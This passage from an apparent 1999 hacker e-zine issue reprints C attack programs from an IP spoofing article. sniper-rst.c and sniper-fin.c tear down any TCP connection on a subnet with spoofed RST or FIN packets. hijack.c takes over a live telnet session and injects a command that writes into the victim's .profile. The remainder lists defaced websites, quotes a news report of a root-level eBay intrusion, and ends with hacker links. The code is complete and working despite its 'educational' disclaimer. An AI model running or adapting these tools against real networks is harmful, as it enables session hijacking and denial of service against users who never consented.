  8416.        rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2));
  8417.           
  8418.        rc_so   = (unsigned char *) &(rc_IPhead->source);
  8419.        rc_dest = (unsigned char *) &(rc_IPhead->destination);   
  8420.        sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
  8421.                      rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source),
  8422.                      rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination)); 
  8423.                
  8424.        if(strcmp(packet_id,rc_filter_string)==0)
  8425.                { 
  8426.                SP_DATA_BUSY=1;
  8427.                CUR_SEQ = ntohl(rc_TCPhead->seq_nr);
  8428.                CUR_ACK = ntohl(rc_TCPhead->ACK_nr);
  8429.                CUR_FLAGS = ntohs(rc_TCPhead->offset_flag);
  8430.                CUR_DATALEN = ntohs(rc_IPhead->length) - 
  8431.                              ((rc_IPhead->verlen & 0xF) << 2) -
  8432.                              ((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10);
  8433.                CUR_COUNT++;
  8434.                SP_DATA_BUSY=0;
  8435.                }
  8436.        }
  8437.        
  8438.        void set_filter (char *f_source, unsigned short f_source_port,
  8439.                         char *f_dest, unsigned short f_dest_port)
  8440.        {
  8441.        unsigned char *f_so, *f_des;
  8442.        unsigned long f_sol, f_destl;
  8443.        
  8444.        RC_FILTSET=0;
  8445.        if(DEV_PREFIX==9999)
  8446.                fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1);
  8447.        f_sol   = sp_getaddrbyname(f_source);
  8448.        f_destl = sp_getaddrbyname(f_dest);
  8449.        f_so    = (unsigned char *) &f_sol;
  8450.        f_des   = (unsigned char *) &f_destl;   
  8451.        sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
  8452.                                      f_so[0],f_so[1],f_so[2],f_so[3],f_source_port,    
  8453.                                      f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port); 
  8454.        RC_FILTSET=1;
  8455.        }
  8456.        
  8457.        ---=[ sniper-rst.c ]=---------------------------------------------------------
  8458.        /**************************************************************************/
  8459.        /*  Sniper-rst - Example program on connection killing with IP spoofing   */
  8460.        /*               Using the RST flag.                                      */
  8461.        /*               (illustration for 'A short overview of IP spoofing')     */
  8462.        /*                                                                        */
  8463.        /*  Purpose - Killing any TCP connection on your subnet                   */
  8464.        /*                                                                        */
  8465.        /*  Author - Brecht Claerhout <Coder@reptile.rug.ac.be>                   */
  8466.        /*           Serious advice, comments, statements, greets, always welcome */
  8467.        /*           flames, moronic 3l33t >/dev/null                             */
  8468.        /*                                                                        */
  8469.        /*  Disclaimer - This program is for educational purposes only. I am in   */
  8470.        /*               NO way responsible for what you do with this program,    */
  8471.        /*               or any damage you or this program causes.                */
  8472.        /*                                                                        */
  8473.        /*  For whom - People with a little knowledge of TCP/IP, C source code    */
  8474.        /*             and general UNIX. Otherwise, please keep your hands of,    */
  8475.        /*             and catch up on those things first.                        */
  8476.        /*                                                                        */
  8477.        /*  Limited to - Linux 1.3.X or higher.                                   */
  8478.        /*               ETHERNET support ("eth0" device)                         */
  8479.        /*               If you network configuration differs it shouldn't be to  */
  8480.        /*               hard to modify yourself. I got it working on PPP too,    */
  8481.        /*               but I'm not including extra configuration possibilities  */
  8482.        /*               because this would overload this first release that is   */
  8483.        /*               only a demonstration of the mechanism.                   */
  8484.        /*               Anyway if you only have ONE network device (slip,        */
  8485.        /*               ppp,... ) after a quick look at this code and spoofit.h  */
  8486.        /*               it will only take you a few secs to fix it...            */
  8487.        /*               People with a bit of C knowledge and well known with     */
  8488.        /*               their OS shouldn't have to much trouble to port the code.*/
  8489.        /*               If you do, I would love to get the results.              */
  8490.        /*                                                                        */
  8491.        /*  Compiling - gcc -o sniper-rst sniper-rst.c                            */
  8492.        /*                                                                        */
  8493.        /*  Usage - Usage described in the spoofing article that came with this.  */
  8494.        /*          If you didn't get this, try to get the full release...        */
  8495.        /*                                                                        */
  8496.        /*  See also - Sniffit (for getting the necessairy data on a connection)  */
  8497.        /**************************************************************************/
  8498.                                                               
  8499.        #include "spoofit.h"
  8500.        
  8501.        /* Those 2 'defines' are important for putting the receiving device in  */
  8502.        /* PROMISCUOUS mode                                                     */    
  8503.        #define INTERFACE       "eth0" 
  8504.        #define INTERFACE_PREFIX 14  
  8505.        
  8506.        char SOURCE[100],DEST[100];
  8507.        int SOURCE_P,DEST_P;
  8508.        
  8509.        void main(int argc, char *argv[])
  8510.        {
  8511.        int i,stat,j;
  8512.        int fd_send, fd_receive;
  8513.        unsigned long sp_ack, sp_seq;
  8514.        unsigned short flags;
  8515.        struct sp_wait_packet pinfo;
  8516.        
  8517.        if(argc != 5)
  8518.                {
  8519.                printf("usage: %s host1 port1 host2 port2\n",argv[0]);
  8520.                exit(0);
  8521.                }
  8522.        
  8523.        /* preparing some work */
  8524.        DEV_PREFIX = INTERFACE_PREFIX;
  8525.        strcpy(SOURCE,argv[1]);
  8526.        SOURCE_P=atoi(argv[2]);
  8527.        strcpy(DEST,argv[3]);
  8528.        DEST_P=atoi(argv[4]);
  8529.        
  8530.        /* opening sending and receiving sockets */
  8531.        fd_send = open_sending();
  8532.        fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */
  8533.        
  8534.        printf("Trying to terminate the connection\n");
  8535.        
  8536.        for(i=1;i<=100;i++)
  8537.          {
  8538.          /* Waiting for a packet containing an ACK */
  8539.          stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,5);
  8540.          if(stat==-1)  {printf("Connection 5 secs idle or dead...\n");exit(1);}
  8541.          sp_seq=pinfo.ack;
  8542.          sp_ack=0;
  8543.          j=0;
  8544.          /* Sending our fake Packet */
  8545.        
  8546.        /* for(j=0;j<10;j++)    This would be better       */  
  8547.        /*      {                                          */
  8548.                transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
  8549.                                                                sp_seq+j,sp_ack,RST);
  8550.        /*      }                                          */
  8551.        
  8552.          /* waiting for confirmation */
  8553.          stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,5);
  8554.          if(stat<0)
  8555.              {
  8556.              printf("Connection 5 secs idle or dead...\n");
  8557.              exit(0);
  8558.              }  
  8559.          }
  8560.        printf("I did not succeed in killing it.\n");
  8561.        }
  8562.        
  8563.        ------------------------------------------------------------------------------
  8564.        
  8565.        ---=[ sniper-fin.c ]=---------------------------------------------------------
  8566.        /**************************************************************************/
  8567.        /*  Sniper-fin - Example program on connection killing with IP spoofing   */
  8568.        /*               using the FIN flag.                                      */
  8569.        /*               (illustration for 'A short overview of IP spoofing')     */
  8570.        /*                                                                        */
  8571.        /*  Purpose - Killing any TCP connection on your subnet                   */
  8572.        /*                                                                        */
  8573.        /*  Author - Brecht Claerhout <Coder@reptile.rug.ac.be>                   */
  8574.        /*           Serious advice, comments, statements, greets, always welcome */
  8575.        /*           flames, moronic 3l33t >/dev/null                             */
  8576.        /*                                                                        */
  8577.        /*  Disclaimer - This program is for educational purposes only. I am in   */
  8578.        /*               NO way responsible for what you do with this program,    */
  8579.        /*               or any damage you or this program causes.                */
  8580.        /*                                                                        */
  8581.        /*  For whom - People with a little knowledge of TCP/IP, C source code    */
  8582.        /*             and general UNIX. Otherwise, please keep your hands of,    */
  8583.        /*             and catch up on those things first.                        */
  8584.        /*                                                                        */
  8585.        /*  Limited to - Linux 1.3.X or higher.                                   */
  8586.        /*               ETHERNET support ("eth0" device)                         */
  8587.        /*               If you network configuration differs it shouldn't be to  */
  8588.        /*               hard to modify yourself. I got it working on PPP too,    */
  8589.        /*               but I'm not including extra configuration possibilities  */
  8590.        /*               because this would overload this first release that is   */
  8591.        /*               only a demonstration of the mechanism.                   */
  8592.        /*               Anyway if you only have ONE network device (slip,        */
  8593.        /*               ppp,... ) after a quick look at this code and spoofit.h  */
  8594.        /*               it will only take you a few secs to fix it...            */
  8595.        /*               People with a bit of C knowledge and well known with     */
  8596.        /*               their OS shouldn't have to much trouble to port the code.*/
  8597.        /*               If you do, I would love to get the results.              */
  8598.        /*                                                                        */
  8599.        /*  Compiling - gcc -o sniper-fin sniper-fin.c                            */
  8600.        /*                                                                        */
  8601.        /*  Usage - Usage described in the spoofing article that came with this.  */
  8602.        /*          If you didn't get this, try to get the full release...        */
  8603.        /*                                                                        */
  8604.        /*  See also - Sniffit (for getting the necessairy data on a connection)  */
  8605.        /**************************************************************************/
  8606.                                                               
  8607.        #include "spoofit.h"
  8608.        
  8609.        /* Those 2 'defines' are important for putting the receiving device in  */
  8610.        /* PROMISCUOUS mode                                                     */    
  8611.        #define INTERFACE       "eth0" 
  8612.        #define INTERFACE_PREFIX 14  
  8613.        
  8614.        char SOURCE[100],DEST[100];
  8615.        int SOURCE_P,DEST_P;
  8616.        
  8617.        void main(int argc, char *argv[])
  8618.        {
  8619.        int i,stat;
  8620.        int fd_send, fd_receive;
  8621.        unsigned long sp_ack, sp_seq;
  8622.        unsigned short flags;
  8623.        struct sp_wait_packet pinfo;
  8624.        
  8625.        if(argc != 5)
  8626.                {
  8627.                printf("usage: %s host1 port1 host2 port2\n",argv[0]);
  8628.                exit(0);
  8629.                }
  8630.        
  8631.        /* preparing some work */
  8632.        DEV_PREFIX = INTERFACE_PREFIX;
  8633.        strcpy(SOURCE,argv[1]);
  8634.        SOURCE_P=atoi(argv[2]);
  8635.        strcpy(DEST,argv[3]);
  8636.        DEST_P=atoi(argv[4]);
  8637.        
  8638.        /* opening sending and receiving sockets */
  8639.        fd_send = open_sending();
  8640.        fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */
  8641.        
  8642.        for(i=1;i<100;i++)
  8643.          {
  8644.          printf("Attack Sequence %d.\n",i);
  8645.          /* Waiting for a packet containing an ACK */
  8646.          stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
  8647.          if(stat==-1)  {printf("Connection 10 secs idle... timeout.\n");exit(1);}
  8648.          sp_seq=pinfo.ack;
  8649.          sp_ack=pinfo.seq+pinfo.datalen;
  8650.          /* Sending our fake Packet */
  8651.          transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,sp_seq,sp_ack,ACK|FIN);
  8652.          /* waiting for confirmation */
  8653.          stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
  8654.          if(stat>=0)
  8655.              {
  8656.              printf("Killed the connection...\n");
  8657.              exit(0);
  8658.              }  
  8659.          printf("Hmmmm.... no response detected... (retry)\n");
  8660.          }
  8661.        printf("I did not succeed in killing it.\n");
  8662.        }
  8663.        
  8664.        ------------------------------------------------------------------------------
  8665.        
  8666.        ---=[ hijack.c ]=-------------------------------------------------------------
  8667.        /**************************************************************************/
  8668.        /*  Hijack - Example program on connection hijacking with IP spoofing     */
  8669.        /*               (illustration for 'A short overview of IP spoofing')     */
  8670.        /*                                                                        */
  8671.        /*  Purpose - taking control of a running telnet session, and executing   */
  8672.        /*            our own command in that shell.                              */
  8673.        /*                                                                        */
  8674.        /*  Author - Brecht Claerhout <Coder@reptile.rug.ac.be>                   */
  8675.        /*           Serious advice, comments, statements, greets, always welcome */
  8676.        /*           flames, moronic 3l33t >/dev/null                             */
  8677.        /*                                                                        */
  8678.        /*  Disclaimer - This program is for educational purposes only. I am in   */
  8679.        /*               NO way responsible for what you do with this program,    */
  8680.        /*               or any damage you or this program causes.                */
  8681.        /*                                                                        */
  8682.        /*  For whom - People with a little knowledge of TCP/IP, C source code    */ 
  8683.        /*             and general UNIX. Otherwise, please keep your hands of,    */
  8684.        /*             and catch up on those things first.                        */
  8685.        /*                                                                        */
  8686.        /*  Limited to - Linux 1.3.X or higher.                                   */
  8687.        /*               ETHERNET support ("eth0" device)                         */
  8688.        /*               If you network configuration differs it shouldn't be to  */
  8689.        /*               hard to modify yourself. I got it working on PPP too,    */
  8690.        /*               but I'm not including extra configuration possibilities  */
  8691.        /*               because this would overload this first release that is   */
  8692.        /*               only a demonstration of the mechanism.                   */
  8693.        /*               Anyway if you only have ONE network device (slip,        */
  8694.        /*               ppp,... ) after a quick look at this code and spoofit.h  */
  8695.        /*               it will only take you a few secs to fix it...            */
  8696.        /*               People with a bit of C knowledge and well known with     */
  8697.        /*               their OS shouldn't have to much trouble to port the code.*/
  8698.        /*               If you do, I would love to get the results.              */
  8699.        /*                                                                        */
  8700.        /*  Compiling - gcc -o hijack hijack.c                                    */
  8701.        /*                                                                        */
  8702.        /*  Usage - Usage described in the spoofing article that came with this.  */
  8703.        /*          If you didn't get this, try to get the full release...        */ 
  8704.        /*                                                                        */
  8705.        /*  See also - Sniffit (for getting the necessairy data on a connection)  */
  8706.        /**************************************************************************/
  8707.        
  8708.        #include "spoofit.h"       /* My spoofing include.... read licence on this */
  8709.        
  8710.        /* Those 2 'defines' are important for putting the receiving device in  */
  8711.        /* PROMISCUOUS mode                                                     */
  8712.        #define INTERFACE               "eth0"  /* first ethernet device          */
  8713.        #define INTERFACE_PREFIX         14     /* 14 bytes is an ethernet header */
  8714.        
  8715.        #define PERSONAL_TOUCH          666
  8716.        
  8717.        int fd_receive, fd_send;
  8718.        char CLIENT[100],SERVER[100];
  8719.        int CLIENT_P;
  8720.        
  8721.        void main(int argc, char *argv[]) 
  8722.        { 
  8723.        int i,j,count;
  8724.        struct sp_wait_packet attack_info;
  8725.        unsigned long sp_seq ,sp_ack; 
  8726.        unsigned long old_seq ,old_ack; 
  8727.        unsigned long serv_seq ,serv_ack; 
  8728.        
  8729.        /* This data used to clean up the shell line */
  8730.        char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a};
  8731.        char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n";
  8732.        
  8733.        if(argc!=4)
  8734.                {
  8735.                printf("Usage: %s client client_port server\n",argv[0]);
  8736.                exit(1);
  8737.                }
  8738.        strcpy(CLIENT,argv[1]);
  8739.        CLIENT_P=atoi(argv[2]);
  8740.        strcpy(SERVER,argv[3]);
  8741.        
  8742.        /* preparing all necessary sockets (sending + receiving) */
  8743.        DEV_PREFIX = INTERFACE_PREFIX;
  8744.        fd_send = open_sending();                  
  8745.        fd_receive = open_receiving(INTERFACE, 0);  /* normal BLOCKING mode */
  8746.        
  8747.        printf("Starting Hijacking demo - Brecht Claerhout 1996\n");
  8748.        printf("-----------------------------------------------\n");
  8749.        
  8750.        for(j=0;j<50;j++)
  8751.          {
  8752.          printf("\nTakeover phase 1: Stealing connection.\n");
  8753.          wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);
  8754.          sp_seq=attack_info.seq+attack_info.datalen; 
  8755.          sp_ack=attack_info.ack;
  8756.          printf("  Sending Spoofed clean-up data...\n");
  8757.          transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23,
  8758.                                                              sp_seq,sp_ack,ACK|PSH);
  8759.        /* NOTE: always beware you receive y'r OWN spoofed packs! */
  8760.        /*       so handle it if necessary                         */
  8761.          count=0;
  8762.          printf("  Waiting for spoof to be confirmed...\n");
  8763.          while(count<5)
  8764.                {
  8765.                wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
  8766.                if(attack_info.ack==sp_seq+sizeof(to_data))
  8767.                        count=PERSONAL_TOUCH;
  8768.                else count++;
  8769.                };
  8770.          if(count!=PERSONAL_TOUCH)
  8771.                {printf("Phase 1 unsuccesfully ended.\n");}
  8772.          else {printf("Phase 1 ended.\n"); break;};
  8773.          };
  8774.        
  8775.        printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n");
  8776.        count=serv_seq=old_ack=0;
  8777.        while(count<10)
  8778.                {
  8779.                old_seq=serv_seq;
  8780.                old_ack=serv_ack;
  8781.                wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0);
  8782.                if(attack_info.datalen==0)
  8783.                  {
  8784.                  serv_seq=attack_info.seq+attack_info.datalen;
  8785.                  serv_ack=attack_info.ack;
  8786.                  if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
  8787.                        count=PERSONAL_TOUCH;
  8788.                  else count++;
  8789.                  }
  8790.                };
  8791.        if(count!=PERSONAL_TOUCH)
  8792.                {printf("Phase 2 unsuccesfully ended.\n"); exit(0);}
  8793.        printf("  Server SEQ: %X (hex)    ACK: %X (hex)\n",serv_seq,serv_ack);
  8794.        printf("Phase 2 ended.\n");
  8795.        
  8796.        printf("\nTakeover phase 3: Sending MY data.\n");
  8797.        printf("  Sending evil data.\n");
  8798.        transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, 
  8799.                     SERVER,23,serv_ack,serv_seq,ACK|PSH);
  8800.        count=0;
  8801.        printf("  Waiting for evil data to be confirmed...\n");
  8802.        while(count<5)
  8803.                {
  8804.                wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
  8805.                if(attack_info.ack==serv_ack+sizeof(evil_data))
  8806.                        count=PERSONAL_TOUCH;
  8807.                else count++;
  8808.                };
  8809.        if(count!=PERSONAL_TOUCH)
  8810.                {printf("Phase 3 unsuccesfully ended.\n"); exit(0);}
  8811.        printf("Phase 3 ended.\n");
  8812.        
  8813.        }
  8814.        
  8815.        
  8816.  
  8817.       (c)1999 http://www.real-secure.org/
  8818.      
  8819.      
  8820.  
  8821.        @HWA
  8822.        
  8823.  
  8824.        
  8825.   H.W  Hacked websites March19th-March27th
  8826.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8827.  
  8828.      Note: The hacked site reports stay, especially with some cool hits by
  8829.            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
  8830.  
  8831.          * Hackers Against Racist Propaganda (See issue #7)
  8832.         
  8833.        For the most part these sites are gleaned from the rumours section of HNN
  8834.       unless otherwise noted and are just that, unconfirmed rumours... 
  8835.         
  8836.          
  8837.       Here's a couple I missed last issue/earlier issues;
  8838.             
  8839.       http://www.goodyear.com - via irc (unconf.)
  8840.       
  8841.       And;
  8842.       
  8843.        Date: Fri, 19 Mar 1999 13:19:36 -0700 (MST) 
  8844.        From: mea culpa <jericho@dimensional.com> 
  8845.        To: InfoSec News <isn@repsec.com> 
  8846.        Subject: [ISN] Going once, going twice... HACKED! 
  8847.        Message-ID: <Pine.SUN.3.96.990319131914.8313m-100000@flatland.dimensional.com> 
  8848.        Sender: owner-isn@repsec.com 
  8849.        Reply-To: mea culpa <jericho@dimensional.com> 
  8850.        
  8851.        
  8852.        
  8853.        Going once, going twice... HACKED!
  8854.        
  8855.        
  8856.        By Adam L. Penenberg
  8857.        
  8858.        
  8859.        eBay, the hot one-to-one auction site, was hacked on Saturday by a 22-year
  8860.        old college student who goes by the handle MagicFX. But the story doesn't
  8861.        end there. The hacker maintains access to the site and can return at will.
  8862.        He has 'root' access to eBay's computers, the same kind the legitimate
  8863.        administrators enjoy. This means he could change prices or place fake ads,
  8864.        divert traffic to other sites or even take down the entire network.
  8865.        
  8866.        
  8867.        This was starkly illustrated to this reporter on Wednesday night, when the
  8868.        hacker, to prove his point, took down eBay's home page for two minutes and
  8869.        replaced it with the message:
  8870.        
  8871.        
  8872.        "by MagicFX
  8873.        
  8874.        
  8875.        "That you can't always trust people - not even huge companies. (who woulda
  8876.        known that?)
  8877.        
  8878.        
  8879.        "It's 9:30 PM do you know who has your credit card information?" 
  8880.        
  8881.        
  8882.        (Check out the rest at http://www.forbes.com/tool/html/99/mar/0319/side1.htm)
  8883.        
  8884.        
  8885.        
  8886.        
  8887.        -o-
  8888.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  8889.        Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
  8890.  
  8891.  
  8892.        To: InfoSec News <isn@repsec.com> 
  8893.  
  8894.        Subject: [ISN] Subject: Brazilian Security Forum'99 is hacked 
  8895.        Forwarded From: c0nd0r <root@sekure.org>
  8896.        [March 12, Sao Paulo, Brazil] 
  8897.        
  8898.        
  8899.        The largest security meeting in the South America was hacked by brazilian
  8900.        group called "Brazilian r00ts". 
  8901.        
  8902.        
  8903.        They took control the event's web site, which was located at
  8904.        http://www.mantel.com.br/eventos/security. The Security Forum'99 is the
  8905.        most important event on information security in the South America and its
  8906.        main purpose was discuss vulnerabilities and ways to defeat break-ins. 
  8907.        
  8908.        
  8909.        One of the most important guests was Christopher Klaus from ISS, as well
  8910.        as people from Axent. 
  8911.        
  8912.        
  8913.        The company responsible for the organization of the event, Mantel, was
  8914.        also hacked (www.mantel.com.br). 
  8915.        
  8916.        
  8917.        
  8918.        -o-
  8919.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  8920.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]  
  8921.        
  8922.      
  8923.        March 24th
  8924.        
  8925.        From HNN rumours section;
  8926.        
  8927.        Kipling cracked 
  8928.  
  8929.  
  8930.        contributed by cluebie 
  8931.        
  8932.        I was really trying to ignore this whole mess. First a
  8933.        
  8934.         Belgium garment manufacturer makes extremely
  8935.        disparaging remarks about hackers on its web site. Then
  8936.        it looks like someone may have defaced their web page,
  8937.        then Leander Kahney of Wired Online writes a story
  8938.        about it all that totally screws up the words hacker and
  8939.        cracker. I am kind of surprised that the defaced page
  8940.        has still not been fixed 12 hours later. This whole mess
  8941.        just reeks of marketing. 
  8942.  
  8943.        contributed by Anonymous 
  8944.        
  8945.        http://www.cablevision.com.ve/
  8946.        http://www.des-con-systems.com/
  8947.      
  8948.      
  8949.        contributed by Anonymous 
  8950.        
  8951.        Cracked/From HNN Rumours section March 22nd 
  8952.        http://www.hackernews.com/
  8953.        
  8954.        Looks like some people have been rather busy this
  8955.        weekend. This is just a few of the sites which where
  8956.        reported to us as being compromised.
  8957.        
  8958.         http://www.peoplescourt.com 
  8959.         http://www.menura.com 
  8960.         http://www.thetargetgroup.com 
  8961.         http://www.asma-homehealth.com/ 
  8962.         http://www.vasodeleche.com/
  8963.         http://www.home-listings.com/
  8964.         http://www.cddhcu.gob.mx/
  8965.         http://www.servnet.com.mx 
  8966.         http://www.hallpasstv.com 
  8967.         http://www.tocca.com 
  8968.         http://www.varsitysoft.com 
  8969.         http://www.ashlin.com 
  8970.         http://www.superstation.net 
  8971.         http://www.bhicorp.com 
  8972.         http://www.graydonamerica.com 
  8973.         http://www.fusive.com 
  8974.         http://www.esiglobal.com 
  8975.         http://www.q-time.com 
  8976.         http://www.colco.net 
  8977.         http://www.frasersfur.com 
  8978.         http://www.opf-jamaica.org 
  8979.         http://www.webplaza.net 
  8980.  
  8981.         From HNN rumours section, March 23rd:
  8982.         
  8983.         http://www.cortroninc.com 
  8984.         
  8985.  
  8986.       @HWA
  8987.       
  8988.       
  8989.      
  8990.        _________________________________________________________________________
  8991.  
  8992.   A.0                              APPENDICES
  8993.        _________________________________________________________________________
  8994.  
  8995.  
  8996.  
  8997.   A.1  PHACVW, sekurity, security, cyberwar links
  8998.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8999.  
  9000.        The links are no longer maintained in this file, there is now a
  9001.       links section on the http://welcome.to/HWA.hax0r.news/ url so check
  9002.       there for current links etc.
  9003.  
  9004.       The hack FAQ (The #hack/alt.2600 faq)
  9005.       http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
  9006.  
  9007.       Hacker's Jargon File (The quote file)
  9008.       http://www.lysator.liu.se/hackdict/split2/main_index.html
  9009.  
  9010.  
  9011.       Featured site:
  9012.       
  9013.       http://www.real-secure.org/ ...... Interesting site check it out, nice
  9014.                                          layout, cool format, cool info.
  9015.       
  9016.  
  9017.  
  9018.  
  9019.  
  9020.       International links:(TBC)
  9021.       ~~~~~~~~~~~~~~~~~~~~~~~~~
  9022.  
  9023.       Foreign correspondants and others please send in news site links that
  9024.       have security news from foreign countries for inclusion in this list
  9025.       thanks... - Ed
  9026.  
  9027.       
  9028.           
  9029.       Belgium.......: http://bewoner.dma.be/cum/
  9030.       Brasil........: http://www.psynet.net/ka0z
  9031.                       http://www.elementais.cjb.net
  9032.       Columbia......: http://www.cascabel.8m.com
  9033.                       http://www.intrusos.cjb.net
  9034.       Indonesia.....: http://www.k-elektronik.org/index2.html
  9035.                       http://members.xoom.com/neblonica/
  9036.                       http://hackerlink.or.id/                      
  9037.       Netherlands...: http://security.pine.nl/                      
  9038.       Russia........: http://www.tsu.ru/~eugene/
  9039.       Singapore.....: http://www.icepoint.com
  9040.  
  9041.     Got a link for this section? email it to hwa@press.usmc.net and i'll
  9042.     review it and post it here if it merits it.
  9043.  
  9044.     @HWA
  9045.     
  9046.  
  9047.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  9048.     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  9049.  
  9050.     ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news
  9051.     (r) Cruciphux is a trade mark of Hoary Wild Arachnids Inc.
  9052.  
  9053.  
  9054.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  9055.  
  9056.                          
  9057.      --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  9058.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  9059.    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  9060.        [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]